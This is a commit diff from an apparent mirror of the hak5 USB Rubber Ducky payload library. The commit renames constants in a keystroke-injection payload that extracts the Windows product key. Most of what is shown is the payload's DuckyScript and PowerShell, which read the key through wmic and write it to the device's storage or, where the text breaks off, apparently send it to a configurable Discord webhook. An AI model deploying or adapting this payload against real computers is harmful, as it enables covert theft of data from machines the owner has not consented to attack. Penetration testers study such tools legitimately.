hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

from - to _

pull/400/head
Alessandro Greco 2024-08-20 12:27:36 +02:00
parent e595d71ac3
commit c895160753
2 changed files with 7 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/README.md
View File

@ -32,7 +32,7 @@ Tested on:
This portion of the payload serves as a user-defined configuration section where you should input your Discord Webhook URL. You should replace "example.com" with the actual Discord Webhook URL you want to use. The Webhook URL is the endpoint where your payload will send the acquired information related to the Windows Product Key, as well as its type, for exfiltration to a specified Discord channel or server. It's a crucial part of the payload that connects the data extraction process to your Discord platform for further analysis or actions.
```DuckyScript
DEFINE #DISCORD-WEBHOOK example.com
DEFINE #DISCORD_WEBHOOK example.com
```
## Payload Description

12
payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/payload.txt
View File

@ -11,14 +11,14 @@ REM_BLOCK
END_REM
REM Put here your Discord Webhook, i.e. https://discord.com/api/webhooks/0123456789.../abcefg...
DEFINE #DISCORD-WEBHOOK example.com
DEFINE #DISCORD_WEBHOOK example.com
REM_BLOCK
How would you prefer to do the exfiltration?
Via Discord Webhooks or via Rubber Ducky USB storage?
If you prefer to use the storage offered by USB Rubber Ducky, set the boolean variable #USB-RUBBER-DUCKY-STORAGE to TRUE, otherwise set it to FALSE and the alternative mode will be automatically selected, so via Discord Webhook.
If you prefer to use the storage offered by USB Rubber Ducky, set the boolean variable #USB_RUBBER_DUCKY_STORAGE to TRUE, otherwise set it to FALSE and the alternative mode will be automatically selected, so via Discord Webhook.
END_REM
DEFINE #USB-RUBBER-DUCKY-STORAGE TRUE
DEFINE #USB_RUBBER_DUCKY_STORAGE TRUE
EXTENSION DETECT_READY
@ -57,15 +57,15 @@ DELAY 2000
STRINGLN $key_detected=$(wmic path softwarelicensingservice get OA3xOriginalProductKey)+$(wmic path softwarelicensingservice get OA3xOriginalProductKeyDescription);
IF_DEFINED_TRUE #USB-RUBBER-DUCKY-STORAGE
IF_DEFINED_TRUE #USB_RUBBER_DUCKY_STORAGE
STRINGLN
$m=(Get-Volume -FileSystemLabel 'DUCK').DriveLetter;
echo $key_detected >> ${m}:\exfiltration.txt
END_STRINGLN
END_IF_DEFINED
IF_NOT_DEFINED_TRUE #USB-RUBBER-DUCKY-STORAGE
IF_NOT_DEFINED_TRUE #USB_RUBBER_DUCKY_STORAGE
STRINGLN
$hookUrl = "#DISCORD-WEBHOOK"
$hookUrl = "#DISCORD_WEBHOOK"
$exfiltration = @"$key_detected"@
$payload = [PSCustomObject]@{
content = $exfiltration